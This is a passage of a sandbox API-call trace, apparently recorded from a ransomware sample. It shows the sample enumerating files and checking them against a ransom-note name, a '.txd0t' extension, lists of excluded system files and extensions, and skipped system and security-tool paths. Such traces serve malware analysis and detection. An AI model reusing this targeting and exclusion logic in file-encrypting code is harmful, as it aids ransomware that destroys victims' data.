nFileSizeLow=0x9882, dwReserved0=0x6c0e48, dwReserved1=0x0, cFileName="UiInfo.xml", cAlternateFileName="")) returned 0 [0071.582] FindClose (in: hFindFile=0xec2530 | out: hFindFile=0xec2530) returned 1 [0071.582] GetProcessHeap () returned 0xe30000 [0071.582] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecab68 | out: hHeap=0xe30000) returned 1 [0071.582] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbc518d00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbc518d00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbc518d00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x3ef6, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="DHtmlHeader.html", cAlternateFileName="DHTMLH~1.HTM")) returned 1 [0071.582] StrCmpW (psz1="DHtmlHeader.html", psz2=".") returned 1 [0071.582] StrCmpW (psz1="DHtmlHeader.html", psz2="..") returned 1 [0071.582] StrCpyNW (in: psz1=0xec6e60, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0071.582] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0071.582] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="DHtmlHeader.html", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\DHtmlHeader.html") returned="C:\\588bce7c90097ed212\\DHtmlHeader.html" [0071.582] PathFindExtensionW (pszPath="DHtmlHeader.html") returned=".html" [0071.582] StrCmpW (psz1=".html", psz2=".txd0t") returned -1 [0071.582] StrCmpIW (psz1="DHtmlHeader.html", psz2="bootsect.bak") returned 1 [0071.582] StrCmpIW (psz1="DHtmlHeader.html", psz2="iconcache.db") returned -1 [0071.582] StrCmpIW (psz1="DHtmlHeader.html", psz2="thumbs.db") returned -1 [0071.582] StrCmpIW (psz1="DHtmlHeader.html", psz2=" ransomware ") returned 1 [0071.582] StrCmpIW (psz1="DHtmlHeader.html", psz2=" ransom ") returned 1 [0071.582] StrCmpIW (psz1="DHtmlHeader.html", psz2="debug.txt") returned 1 [0071.582] StrCmpIW (psz1="DHtmlHeader.html", psz2="boot.ini") returned 1 [0071.582] StrCmpIW (psz1="DHtmlHeader.html", psz2="desktop.ini") returned 1 [0071.582] StrCmpIW (psz1="DHtmlHeader.html", psz2="autorun.inf") returned 1 [0071.582] StrCmpIW (psz1="DHtmlHeader.html", psz2="ntuser.dat") returned -1 [0071.582] StrCmpIW (psz1="DHtmlHeader.html", psz2="ntldr") returned -1 [0071.582] StrCmpIW (psz1="DHtmlHeader.html", psz2="ntdetect.com") returned -1 [0071.582] StrCmpIW (psz1="DHtmlHeader.html", psz2="bootfont.bin") returned 1 [0071.582] StrCmpIW (psz1="DHtmlHeader.html", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.582] PathFindExtensionW (pszPath="DHtmlHeader.html") returned=".html" [0071.582] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".html") returned 0x0 [0071.583] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.583] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.583] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.583] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.583] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.583] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.583] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce333000, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xce333000, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xce333000, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x159d5, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="DisplayIcon.ico", cAlternateFileName="DISPLA~1.ICO")) returned 1 [0071.583] StrCmpW (psz1="DisplayIcon.ico", psz2=".") returned 1 [0071.583] StrCmpW (psz1="DisplayIcon.ico", psz2="..") returned 1 [0071.583] StrCpyNW (in: psz1=0xec6e60, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0071.583] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0071.583] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="DisplayIcon.ico", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\DisplayIcon.ico") returned="C:\\588bce7c90097ed212\\DisplayIcon.ico" [0071.583] PathFindExtensionW (pszPath="DisplayIcon.ico") returned=".ico" [0071.583] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0071.583] StrCmpIW (psz1="DisplayIcon.ico", psz2="bootsect.bak") returned 1 [0071.583] StrCmpIW (psz1="DisplayIcon.ico", psz2="iconcache.db") returned -1 [0071.583] StrCmpIW (psz1="DisplayIcon.ico", psz2="thumbs.db") returned -1 [0071.583] StrCmpIW (psz1="DisplayIcon.ico", psz2=" ransomware ") returned 1 [0071.583] StrCmpIW (psz1="DisplayIcon.ico", psz2=" ransom ") returned 1 [0071.583] StrCmpIW (psz1="DisplayIcon.ico", psz2="debug.txt") returned 1 [0071.583] StrCmpIW (psz1="DisplayIcon.ico", psz2="boot.ini") returned 1 [0071.583] StrCmpIW (psz1="DisplayIcon.ico", psz2="desktop.ini") returned 1 [0071.583] StrCmpIW (psz1="DisplayIcon.ico", psz2="autorun.inf") returned 1 [0071.584] StrCmpIW (psz1="DisplayIcon.ico", psz2="ntuser.dat") returned -1 [0071.584] StrCmpIW (psz1="DisplayIcon.ico", psz2="ntldr") returned -1 [0071.584] StrCmpIW (psz1="DisplayIcon.ico", psz2="ntdetect.com") returned -1 [0071.584] StrCmpIW (psz1="DisplayIcon.ico", psz2="bootfont.bin") returned 1 [0071.584] StrCmpIW (psz1="DisplayIcon.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.584] PathFindExtensionW (pszPath="DisplayIcon.ico") returned=".ico" [0071.584] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0071.584] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="Extended", cAlternateFileName="")) returned 1 [0071.584] StrCmpW (psz1="Extended", psz2=".") returned 1 [0071.584] StrCmpW (psz1="Extended", psz2="..") returned 1 [0071.584] StrCpyNW (in: psz1=0xec6e60, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0071.584] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0071.584] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="Extended", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\Extended") returned="C:\\588bce7c90097ed212\\Extended" [0071.584] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="\\windows\\system32\\") returned 0x0 [0071.584] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="\\windows\\syswow64\\") returned 0x0 [0071.584] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="\\windows\\system\\") returned 0x0 [0071.584] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="\\windows\\winsxs\\") returned 0x0 [0071.584] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="\\appdata\\roaming\\") returned 0x0 [0071.584] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="\\appdata\\local\\") returned 0x0 [0071.584] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="\\appdata\\locallow\\") returned 0x0 [0071.584] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="\\all users\\microsoft\\") returned 0x0 [0071.584] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="\\inetpub\\logs\\") returned 0x0 [0071.584] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch=":\\boot\\") returned 0x0 [0071.584] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch=":\\perflogs\\") returned 0x0 [0071.584] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch=":\\programdata\\") returned 0x0 [0071.584] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch=":\\drivers\\") returned 0x0 [0071.584] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch=":\\wsus\\") returned 0x0 [0071.584] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch=":\\efstmpwp\\") returned 0x0 [0071.584] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch=":\\$recycle.bin\\") returned 0x0 [0071.584] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="crypt_detect") returned 0x0 [0071.584] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="cryptolocker") returned 0x0 [0071.584] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="ransomware") returned 0x0 [0071.584] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="C:\\WINDOWS") returned 0x0 [0071.585] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="C:\\Program Files (x86)") returned 0x0 [0071.585] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="C:\\Program Files") returned 0x0 [0071.585] GetProcessHeap () returned 0xe30000 [0071.585] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4be) returned 0xecab68 [0071.585] StrCpyNW (in: psz1=0xecab68, psz2="C:\\588bce7c90097ed212\\Extended", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Extended") returned="C:\\588bce7c90097ed212\\Extended" [0071.585] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Extended", psz2="\\*", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Extended\\*") returned="C:\\588bce7c90097ed212\\Extended\\*" [0071.585] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\Extended\\*", lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec26b0 [0071.585] StrCmpW (psz1=".", psz2=".") returned 0 [0071.585] FindNextFileW (in: hFindFile=0xec26b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.585] StrCmpW (psz1="..", psz2=".") returned 1 [0071.585] StrCmpW (psz1="..", psz2="..") returned 0 [0071.585] FindNextFileW (in: hFindFile=0xec26b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2a714f00, ftCreationTime.dwHighDateTime=0x1cac6f0, ftLastAccessTime.dwLowDateTime=0x2a714f00, ftLastAccessTime.dwHighDateTime=0x1cac6f0, ftLastWriteTime.dwLowDateTime=0x2a714f00, ftLastWriteTime.dwHighDateTime=0x1cac6f0, nFileSizeHigh=0x0, nFileSizeLow=0x16c82, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="Parameterinfo.xml", cAlternateFileName="PARAME~1.XML")) returned 1 [0071.585] StrCmpW (psz1="Parameterinfo.xml", psz2=".") returned 1 [0071.585] StrCmpW (psz1="Parameterinfo.xml", psz2="..") returned 1 [0071.585] StrCpyNW (in: psz1=0xecab68, psz2="C:\\588bce7c90097ed212\\Extended", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Extended") returned="C:\\588bce7c90097ed212\\Extended" [0071.585] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Extended", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Extended\\") returned="C:\\588bce7c90097ed212\\Extended\\" [0071.585] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Extended\\", psz2="Parameterinfo.xml", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml") returned="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml" [0071.585] PathFindExtensionW (pszPath="Parameterinfo.xml") returned=".xml" [0071.585] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0071.585] StrCmpIW (psz1="Parameterinfo.xml", psz2="bootsect.bak") returned 1 [0071.585] StrCmpIW (psz1="Parameterinfo.xml", psz2="iconcache.db") returned 1 [0071.585] StrCmpIW (psz1="Parameterinfo.xml", psz2="thumbs.db") returned -1 [0071.585] StrCmpIW (psz1="Parameterinfo.xml", psz2=" ransomware ") returned 1 [0071.585] StrCmpIW (psz1="Parameterinfo.xml", psz2=" ransom ") returned 1 [0071.585] StrCmpIW (psz1="Parameterinfo.xml", psz2="debug.txt") returned 1 [0071.585] StrCmpIW (psz1="Parameterinfo.xml", psz2="boot.ini") returned 1 [0071.586] StrCmpIW (psz1="Parameterinfo.xml", psz2="desktop.ini") returned 1 [0071.586] StrCmpIW (psz1="Parameterinfo.xml", psz2="autorun.inf") returned 1 [0071.586] StrCmpIW (psz1="Parameterinfo.xml", psz2="ntuser.dat") returned 1 [0071.586] StrCmpIW (psz1="Parameterinfo.xml", psz2="ntldr") returned 1 [0071.586] StrCmpIW (psz1="Parameterinfo.xml", psz2="ntdetect.com") returned 1 [0071.586] StrCmpIW (psz1="Parameterinfo.xml", psz2="bootfont.bin") returned 1 [0071.586] StrCmpIW (psz1="Parameterinfo.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.586] PathFindExtensionW (pszPath="Parameterinfo.xml") returned=".xml" [0071.586] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0071.586] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0071.586] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0071.586] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0071.586] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0071.586] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0071.586] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0071.586] FindNextFileW (in: hFindFile=0xec26b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x988a, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="UiInfo.xml", cAlternateFileName="")) returned 1 [0071.586] StrCmpW (psz1="UiInfo.xml", psz2=".") returned 1 [0071.586] StrCmpW (psz1="UiInfo.xml", psz2="..") returned 1 [0071.586] StrCpyNW (in: psz1=0xecab68, psz2="C:\\588bce7c90097ed212\\Extended", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Extended") returned="C:\\588bce7c90097ed212\\Extended" [0071.586] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Extended", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Extended\\") returned="C:\\588bce7c90097ed212\\Extended\\" [0071.586] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Extended\\", psz2="UiInfo.xml", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml") returned="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml" [0071.586] PathFindExtensionW (pszPath="UiInfo.xml") returned=".xml" [0071.586] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0071.586] StrCmpIW (psz1="UiInfo.xml", psz2="bootsect.bak") returned 1 [0071.586] StrCmpIW (psz1="UiInfo.xml", psz2="iconcache.db") returned 1 [0071.586] StrCmpIW (psz1="UiInfo.xml", psz2="thumbs.db") returned 1 [0071.586] StrCmpIW (psz1="UiInfo.xml", psz2=" ransomware ") returned 1 [0071.586] StrCmpIW (psz1="UiInfo.xml", psz2=" ransom ") returned 1 [0071.586] StrCmpIW (psz1="UiInfo.xml", psz2="debug.txt") returned 1 [0071.586] StrCmpIW (psz1="UiInfo.xml", psz2="boot.ini") returned 1 [0071.586] StrCmpIW (psz1="UiInfo.xml", psz2="desktop.ini") returned 1 [0071.586] StrCmpIW (psz1="UiInfo.xml", psz2="autorun.inf") returned 1 [0071.586] StrCmpIW (psz1="UiInfo.xml", psz2="ntuser.dat") returned 1 [0071.587] StrCmpIW (psz1="UiInfo.xml", psz2="ntldr") returned 1 [0071.587] StrCmpIW (psz1="UiInfo.xml", psz2="ntdetect.com") returned 1 [0071.587] StrCmpIW (psz1="UiInfo.xml", psz2="bootfont.bin") returned 1 [0071.587] StrCmpIW (psz1="UiInfo.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.587] PathFindExtensionW (pszPath="UiInfo.xml") returned=".xml" [0071.587] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0071.587] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0071.587] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0071.587] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0071.587] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0071.587] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0071.587] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0071.587] FindNextFileW (in: hFindFile=0xec26b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x988a, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="UiInfo.xml", cAlternateFileName="")) returned 0 [0071.587] FindClose (in: hFindFile=0xec26b0 | out: hFindFile=0xec26b0) returned 1 [0071.587] GetProcessHeap () returned 0xe30000 [0071.587] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecab68 | out: hHeap=0xe30000) returned 1 [0071.587] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="Graphics", cAlternateFileName="")) returned 1 [0071.587] StrCmpW (psz1="Graphics", psz2=".") returned 1 [0071.587] StrCmpW (psz1="Graphics", psz2="..") returned 1 [0071.587] StrCpyNW (in: psz1=0xec6e60, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0071.587] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0071.587] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="Graphics", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0071.587] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="\\windows\\system32\\") returned 0x0 [0071.587] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="\\windows\\syswow64\\") returned 0x0 [0071.587] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="\\windows\\system\\") returned 0x0 [0071.587] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="\\windows\\winsxs\\") returned 0x0 [0071.587] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="\\appdata\\roaming\\") returned 0x0 [0071.587] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="\\appdata\\local\\") returned 0x0 [0071.587] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="\\appdata\\locallow\\") returned 0x0 [0071.587] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="\\all users\\microsoft\\") returned 0x0 [0071.588] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="\\inetpub\\logs\\") returned 0x0 [0071.588] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch=":\\boot\\") returned 0x0 [0071.588] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch=":\\perflogs\\") returned 0x0 [0071.588] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch=":\\programdata\\") returned 0x0 [0071.588] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch=":\\drivers\\") returned 0x0 [0071.588] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch=":\\wsus\\") returned 0x0 [0071.588] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch=":\\efstmpwp\\") returned 0x0 [0071.588] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch=":\\$recycle.bin\\") returned 0x0 [0071.588] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="crypt_detect") returned 0x0 [0071.588] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="cryptolocker") returned 0x0 [0071.588] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="ransomware") returned 0x0 [0071.588] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="C:\\WINDOWS") returned 0x0 [0071.588] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="C:\\Program Files (x86)") returned 0x0 [0071.588] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="C:\\Program Files") returned 0x0 [0071.588] GetProcessHeap () returned 0xe30000 [0071.588] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4be) returned 0xecab68 [0071.588] StrCpyNW (in: psz1=0xecab68, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0071.588] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\*", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\*") returned="C:\\588bce7c90097ed212\\Graphics\\*" [0071.588] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\Graphics\\*", lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x730e91, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2330 [0071.726] StrCmpW (psz1=".", psz2=".") returned 0 [0071.726] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, 